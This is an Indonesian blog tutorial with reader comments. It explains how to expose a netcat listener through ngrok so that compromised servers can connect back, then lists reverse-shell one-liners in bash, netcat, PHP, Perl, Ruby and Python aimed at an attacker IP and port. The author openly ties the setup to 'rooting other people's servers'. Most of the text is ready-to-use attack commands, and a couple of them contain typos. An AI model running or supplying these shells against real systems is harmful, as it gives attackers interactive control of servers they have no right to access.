Port Forwarding Ngok Dan Reverse Shell

Pertama kita download dulu dari web nya. Kenapa gak pake apt-get (buat debian dan turunannya) aja ? Karena di web ngrok kita bisa mendapatkan versi terbaru, sementara yang ada di repository debian dan ubuntu masih versi lawas.

https://ngrok.com/download Pilih yang sesuai dengan arsitektur OS kalian, 64bit atau 32bit.
Lalu setela didownload masukkan perintah berikut :
unzip ngrok-stable-linux-*
chmod +x ngrok
sudo cp ngrok /usr/bin
Cara pemakaiannya gimana?
Bisa kamu cek di perintah help.
ngrok help
Misalnya kita ingin agar localhost kita (server http port 80) dapat dilihat publik. maka masukkan perintah :
ngrok http 80
Kalian akan mendapatkan alamat forwarding dari ngrok yang bisa diakses publik.
Coba buka di browser :
Nah, selanjutnya kita coba gimana kalo backconnect. Biasanya yang suka ngeroot server orang butuh nih.
Register dulu disini :
Register Ngrok
Kamu akan mendapatkan auth token di dashboard. Install authtoken tersebut dengan perintah
ngrok authtoken xxxxxxxxx
Oke semua sudah disiapkan. Lanjut ke langkah buat back connect.
Kita pakai port 6969 . (ini bebas, boleh pake port mana saja yang gak kepakai).
ngrok tcp 6969
Setelah statusnya sudah online, kita buka tab terminal lain lalu masukkan perintah
nc -lvp 6969
Bagaimana dengan sisi server yang ingin di remote ?
Kamu lihat bagian forwarding ngrok nya . SS diatas menunjukkan
 tcp://0.tcp.ngrok.io:17017
Masukkan host nya 0.tcp.ngrok.io dan port 17017 (bukan 6969) .
Its work!

Perintah Back Connect / Reverse Shell

Cara untuk mendapatkan shell interaktif ketika kita berhasil menemukan celah Command Execution Vulnerability saat melakukan penetration testing. Pilihan kita untuk melakukan reverse shell terbatas pada bahasa pemrograman apa yang terinstall di server target. Nah kali ini saya akan membahas beberapa opsi / command untuk melakukan reverse shell dari php, python, ruby, dll.
Sebelum melakukan reverse shell, pastikan di komputer kita ( attacker ) sudah melakukan listening menggunakan netcat.
sudo nc -l 1337
1337 adalah port yang akan kita buka. Silahkan diubah sesuai selera kalian.
1. Reverse Shell dari Bash
Bash dapat digunakan untuk melakukan reverse shell.
Dari komputer / server target kita masukkan command berikut :
bash -i >& /dev/tcp/192.168.48.133/1337 0>&1
192.168.48.133 adalah ip attacker.
1337 adalah port yang kita buka sebelumnya di command listening menggunakan netcat.
2. Reverse Shell Menggunakan Netcat
Netcat juga bisa digunakan untuk melakukan reverse shell .
Dari komputer target kita masukkan perintah berikut :
/bin/nc.traditional -e /bin/sh 92.168.48.133 1337
 
3. Reverse Shell Menggunakan PHP
Command :
php -r '$sock=fsockopen("192.168.48.133",1337);exec("/bin/sh -i <&3 >&3 2>&3");'
Jika gagal, ubah angka file descriptor dari 3 ke 4, 5, atau 6.
4. Reverse Shell Menggunakan Perl
Perl juga bisa digunakan untuk melakukan reverse shell.
Perintah :
perl -e 'use Socket;$i="192.168.48.133";$p=1337;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'
5. Reverse Shell menggunakan Ruby
Ruby juga memungkinkan kita untuk melakukan reverse shell.
 
Perintah :
ruby -rsocket -e'f=TCPSocket.open("192.168.48.133",1337).to_i;exec/bin/sh -i <&%d >&%d 2>&%d",f,f,f)'
6. Reverse Shell Menggunakan Python
Yang terakhir adalah Python.
Command :
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.48.133",1337));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
Rich Snippets
Published
Article
Port Forwarding Ngok Dan Reverse Shell
Ratings
51star1star1star1star1star
Azizul Hakim

Satu-satunya sumber pengetahuan adalah pengalaman

2 Responses

  1. cvar1984 says:

    Thanks very much 5uhU :* _/][\_

Leave a Reply